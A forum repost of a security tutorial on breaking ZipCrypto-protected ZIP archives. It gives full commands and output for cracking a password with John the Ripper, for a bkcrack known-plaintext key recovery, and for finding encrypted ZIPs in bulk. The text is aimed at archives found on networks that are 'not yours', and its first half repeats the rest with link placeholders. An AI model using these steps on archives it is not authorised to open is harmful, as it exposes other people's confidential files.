stihl не предоставил(а) никакой дополнительной информации.
Sometimes in a network far away, which is most of the time not yours, you might encounter ZIP files protected with passwords. For example, for source code archives, there is quite a good chance to decrypt the ZIPs even without knowing or cracking the password. This is nothing new and has been well-known for several years, but it still seems to be relatively unknown. Personal I learned from this in a blogpost about Для просмотра ссылки Войди или Зарегистрируйся and the quote at the end which sticked
TL;DR:
Для просмотра ссылки Войдиили Зарегистрируйся
Stupid Password Prompt
Для просмотра ссылки Войдиили Зарегистрируйся
Don’t you hate it when that happens?
A stupid password??? …
But there are some good chances to get around this, as the underlying zipCrypto has some attack vectors.
Для просмотра ссылки Войдиили Зарегистрируйся
Time to have some “fun”
The first try would be just to crack the password, as quite often they are really weak.
To demonstrate this, I took Для просмотра ссылки Войдиили Зарегистрируйся.
Для просмотра ссылки Войдиили Зарегистрируйся
Our sample zip
Для просмотра ссылки Войдиили Зарегистрируйся
Just kidding, be careful out there
или Зарегистрируйся for it.
So we build a hash over the zip:
Paste or redirect in a text file and we will see that a strong password is in use…
Для просмотра ссылки Войдиили Зарегистрируйся
Yeah, we want some passwords
Для просмотра ссылки Войдиили Зарегистрируйся
Great plan
Ooooookay 2025, that was a crazy password. For the sake of the more interesting part of the blog, we just ignore this for a moment.
или Зарегистрируйся
Defl:N is a good hint, that we need to deal with Deflate mode of zips, which is not great but okay. There are several modes for ZIP files. Text is from the 7z help and Для просмотра ссылки Войдиили Зарегистрируйся:
Deflate is the most common method, as it is the standard for 7z and others.
zipinfo would provide even more information about the zip if needed.
So what do we need now? We need one exactly same file as provided within the zip file. As we can read the size and the name this is a job for the internet!
Для просмотра ссылки Войдиили Зарегистрируйся
Going to a lovely place
I went for the AJRouter.dll, other files might work as well.
Success rate was quite good for dll files or files with rather unique names like msg_26.txt and a very specific size.
Several options to look for files:
или Зарегистрируйся
GrayHatWarfare is doing great for that
или Зарегистрируйся
Sniffing around
As we can see, we found at least a file with the same size.
So nice, we found our plaintext file. Now as Deflate was the method in use, we need to make a file with several compressions (-mx for 7z). The Range is from 0-9 in that case. So a quick&dirty oneliner will make all zip files for us.
Now we have several zip files with different compressions.
Finally, we can use Для просмотра ссылки Войдиили Зарегистрируйся to run our plaintext attack.
So we need to provide:
или Зарегистрируйся
Go go go
As we can see, with compression 5 we get some keys. This is not surprising, as 5 is the default, but it’s always good to test all compressions and we are talking about seconds for this kind of attack.
Next step is to use the keys to rewrite the ZIP without a password.
That’s it, now we have an unprotected ZIP file where we can access all the files and juicy secrets within.
Для просмотра ссылки Войдиили Зарегистрируйся
Taking all the little secrets
Для просмотра ссылки Войдиили Зарегистрируйся
TL;DR:
- Find an encrypted ZIP
- Hope that it is not AES encrypted
- Get one of the files from the ZIP as plaintext from the internet or other sources
- Profit!
Details
Maybe at some point, after hours of digging on network shares or buckets, you encountered that one ZIP file that looked juicy, and you were ready to open it. You set up the VM without internet access to avoid the honeycred/files/tokens, clicked on the file with the .config, and then…Для просмотра ссылки Войди
Stupid Password Prompt
Для просмотра ссылки Войди
Don’t you hate it when that happens?
A stupid password??? …
But there are some good chances to get around this, as the underlying zipCrypto has some attack vectors.
Для просмотра ссылки Войди
Time to have some “fun”
The first try would be just to crack the password, as quite often they are really weak.
To demonstrate this, I took Для просмотра ссылки Войди
Для просмотра ссылки Войди
Our sample zip
Для просмотра ссылки Войди
Just kidding, be careful out there
Plan A - Standard - Crack it
Для просмотра ссылки ВойдиSo we build a hash over the zip:
Код:
user@localhost ~/zip> john/run/zip2john 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip > zip.hash
ver 2.0 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip/Launcher/ is not encrypted, or stored with non-handled compression type
ver 2.0 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip/Launcher/ActiveSyncProvider.dll PKZIP Encr: cmplen=719649, decmplen=1707520, crc=10BE1B90 ts=06E9 cs=10be type=8
[...]
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.Paste or redirect in a text file and we will see that a strong password is in use…
Для просмотра ссылки Войди
Yeah, we want some passwords
Код:
user@localhost ~/zip> /opt/john/run/john zip.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Note: Passwords longer than 21 [worst case UTF-8] to 63 [ASCII] rejected
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2025-04-03 20:49) 0g/s 1021Kp/s 1021Kc/s 1021KC/s Demuxmgr1900..Zip1900
Proceeding with wordlist:/opt/john/run/password.lst
Enabling duplicate candidate password suppressor
2025 (18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip)
1g 0:00:00:00 DONE 2/3 (2025-04-03 20:49) 4.000g/s 851300p/s 851300c/s 851300C/s navy123..kyle24
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Для просмотра ссылки Войди
Great plan
Ooooookay 2025, that was a crazy password. For the sake of the more interesting part of the blog, we just ignore this for a moment.
Plan B - The cool one - Known Plaintext attack
Cracking is always nice, but the more interesting attack is a plaintext attack against the archive. Some nice details about our attack against the zipcrypto can be found here: Для просмотра ссылки Войди
Код:
First we want to know, what we have to deal with.
user@localhost ~/zip> unzip -vv 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip
Archive: 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip
Length Method Size Cmpr Date Time CRC-32 Name
-------- ------ ------- ---- ---------- ----- -------- ----
0 Stored 0 0% 2025-03-28 21:26 00000000 Launcher/
1707520 Defl:N 719637 58% 2025-02-24 00:55 10be1b90 Launcher/ActiveSyncProvider.dll
0 Stored 0 0% 2025-03-28 20:49 00000000 Launcher/com/
81920 Defl:N 33934 59% 2023-12-04 10:46 c7484291 Launcher/com/AcSpecfc.dll
168448 Defl:N 75753 55% 2025-02-24 00:53 2bf4bfd8 Launcher/com/AdvancedEmojiDS.dll
0 Stored 0 0% 2025-03-28 20:49 00000000 Launcher/data/
26112 Defl:N 10754 59% 2019-12-07 17:08 cd285dbe Launcher/data/AJRouter.dll
1722096 Defl:N 513132 70% 2022-12-23 23:02 161941c4 Launcher/data/alibabacloud-oss-cpp-sdk.dll
0 Stored 0 0% 2024-05-19 02:26 00000000 Launcher/data/changelog.txt
3245 Defl:N 1344 59% 2024-12-04 13:24 6df9108a Launcher/data/COPYRIGHT
163568 Defl:N 55942 66% 2022-12-23 23:02 720eae83 Launcher/data/cpr.dll
[...]
-------- ------- --- -------
767295036 58901308 92% 33 filesDefl:N is a good hint, that we need to deal with Deflate mode of zips, which is not great but okay. There are several modes for ZIP files. Text is from the 7z help and Для просмотра ссылки Войди
Код:
Method Description
LZMA
It's base compression method for 7z format. Even old versions of 7-Zip can decompress archives created with LZMA method. It provides high compression ratio and very fast decompression.
LZMA2
Default compression method of 7z format. LZMA2 is LZMA-based compression method. It provides better multithreading support than LZMA. But compression ratio can be worse in some cases. For best compression ratio with LZMA2 use 1 or 2 CPU threads. If you use LZMA2 with more than 2 threads, 7-zip splits data to chunks and compresses these chunks independently (2 threads per each chunk).
PPMd
Dmitry Shkarin's PPMdH algorithm with small changes. Usually it provides high compression ratio and high speed for text files.
BZip2
Standard compression method based on BWT algorithm. Usually it provides high speed and pretty good compression ratio for text files.
Deflate
Standard compression method of ZIP and GZip formats. Compression ratio is not too high. But it provides pretty fast compressing and decompressing. Deflate method supports only 32 KB dictionary.
Deflate64
Modified version of Deflate algorithm with bigger dictionary (64KB).Deflate is the most common method, as it is the standard for 7z and others.
zipinfo would provide even more information about the zip if needed.
Код:
user@localhost ~/zip> zipinfo -v 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip
Archive: 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip
There is no zipfile comment.
[...]
Central directory entry #2:
---------------------------
There are an extra -36 bytes preceding this file.
Launcher/ActiveSyncProvider.dll
offset of local header from start of archive: 39
(0000000000000027h) bytes
file system or operating system of origin: MS-DOS, OS/2 or NT FAT
version of encoding software: 6.3
minimum file system compatibility required: MS-DOS, OS/2 or NT FAT
minimum software version required to extract: 2.0
compression method: deflated
compression sub-type (deflation): normal
file security status: encrypted
extended local header: no
file last modified on (DOS date/time): 2025 Feb 24 00:55:18
32-bit CRC value (hex): 10be1b90
compressed size: 719649 bytes
uncompressed size: 1707520 bytes
length of filename: 31 characters
length of extra field: 36 bytes
length of file comment: 0 characters
disk number on which file begins: disk 1
apparent file type: binary
non-MSDOS external file attributes: 000000 hex
MS-DOS file attributes (20 hex): arc
[...]So what do we need now? We need one exactly same file as provided within the zip file. As we can read the size and the name this is a job for the internet!
Для просмотра ссылки Войди
Going to a lovely place
I went for the AJRouter.dll, other files might work as well.
Код:
26112 Defl:N 10754 59% 2019-12-07 17:08 cd285dbe Launcher/data/AJRouter.dllSuccess rate was quite good for dll files or files with rather unique names like msg_26.txt and a very specific size.
Several options to look for files:
- Для просмотра ссылки Войди
или Зарегистрируйся is great for this, you can even provide the exact size
GrayHatWarfare is doing great for that
- Other options might be Для просмотра ссылки Войди
или Зарегистрируйся, Для просмотра ссылки Войдиили Зарегистрируйся, Для просмотра ссылки Войдиили Зарегистрируйся, Для просмотра ссылки Войдиили Зарегистрируйся or a Windows System, especially if you are looking for .Net Framework files.
Sniffing around
As we can see, we found at least a file with the same size.
Код:
user@localhost ~/zip> ls -al
total 57572
drwxr-xr-x 3 user user 4096 Apr 2 21:26 ./
drwx------ 39 user user 4096 Apr 2 20:47 ../
-rw-r--r-- 1 user user 58907190 Apr 1 21:07 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip
-rw-r--r-- 1 user user 26112 Apr 2 21:18 AJRouter.dll
drwxr-xr-x 12 user user 4096 Mar 27 20:49 bkcrack/So nice, we found our plaintext file. Now as Deflate was the method in use, we need to make a file with several compressions (-mx for 7z). The Range is from 0-9 in that case. So a quick&dirty oneliner will make all zip files for us.
Код:
user@localhost ~/zip> seq 0 10 | xargs -i 7z a -mm=Deflate -mx{} plain{}.zip /home/user/zip/AJRouter.dll
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs 13th Gen Intel(R) Core(TM) i7-13700H (B06A2),ASM,AES-NI)
Scanning the drive:
1 file, 26112 bytes (26 KiB)
Creating archive: plain0.zip
Items to compress: 1
Files read from disk: 1
Archive size: 11438 bytes (12 KiB)
Everything is Ok
[...]Now we have several zip files with different compressions.
Finally, we can use Для просмотра ссылки Войди
So we need to provide:
- -P our create Zip file
- -p plaintext file in our zip
- -C the zip we want to attack
- -c path to the file we have the plaintext to
Go go go
Код:
user@localhost ~/zip> ls plain*.zip | xargs -i -t ~/zip/bkcrack/install/bkcrack -P {} -p AJRouter.dll -C 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip -c "Launcher/data/AJRouter.dll"
/home/user/zip/bkcrack/install/bkcrack -P plain0.zip -p AJRouter.dll -C 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip -c Launcher/data/AJRouter.dll
bkcrack 1.7.1 - 2024-12-21
Data error: ciphertext is smaller than plaintext.
/home/user/zip/bkcrack/install/bkcrack -P plain10.zip -p AJRouter.dll -C 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip -c Launcher/data/AJRouter.dll
bkcrack 1.7.1 - 2024-12-21
[21:30:15] Z reduction using 10635 bytes of known plaintext
64.3 % (6841 / 10635)
[21:30:16] Attack on 193 Z values at index 4571
100.0 % (193 / 193)
[21:30:16] Could not find the keys.
/home/user/zip/bkcrack/install/bkcrack -P plain1.zip -p AJRouter.dll -C 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip -c Launcher/data/AJRouter.dll
bkcrack 1.7.1 - 2024-12-21
Data error: ciphertext is smaller than plaintext.
[...]
/home/user/zip/bkcrack/install/bkcrack -P plain5.zip -p AJRouter.dll -C 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip -c Launcher/data/AJRouter.dll
bkcrack 1.7.1 - 2024-12-21
[21:30:16] Z reduction using 10747 bytes of known plaintext
84.9 % (9120 / 10747)
[21:30:17] Attack on 256 Z values at index 2656
Keys: 4ba31d26 7d9a4839 a4864fa0
70.3 % (180 / 256)
Found a solution. Stopping.
You may resume the attack with the option: --continue-attack 180
[21:30:17] Keys
4ba31d26 7d9a4839 a4864fa0
[...]As we can see, with compression 5 we get some keys. This is not surprising, as 5 is the default, but it’s always good to test all compressions and we are talking about seconds for this kind of attack.
Next step is to use the keys to rewrite the ZIP without a password.
Код:
user@localhost ~/zip [1]> ~/zip/bkcrack/install/bkcrack -C 18168030a976b6b72dbb2123b00dafc6739c5c26e5e8fbfdff61ae65ee904f70.zip -D withoutpw.zip -k 4ba31d26 7d9a4839 a4864fa0
bkcrack 1.7.1 - 2024-12-21
[21:32:27] Writing decrypted archive withoutpw.zip
100.0 % (27 / 27)That’s it, now we have an unprotected ZIP file where we can access all the files and juicy secrets within.
Код:
user@localhost ~/zip> unzip -v -p withoutpw.zip Launcher/data/COPYRIGHT | head
Copyright © 1993, 2025, Oracle and/or its affiliates.
All rights reserved.
This software and related documentation are provided under a
license agreement containing restrictions on use and
disclosure and are protected by intellectual property laws.
Except as expressly permitted in your license agreement or
allowed by law, you may not use, copy, reproduce, translate,
broadcast, modify, license, transmit, distribute, exhibit,
perform, publish, or display any part, in any form, or byДля просмотра ссылки Войди
Taking all the little secrets
Bonus
If you have a lot of ZIPs and want to check which one have a password protection, which is ofc a strong indicator for some nice little secrets inside, the following OneLiner was handy.
Код:
ls *.zip | xargs -i -t bash -c 'zipinfo -v {} | grep -ic " encrypted"'Links
- Для просмотра ссылки Войди
или Зарегистрируйся
Для просмотра ссылки Войди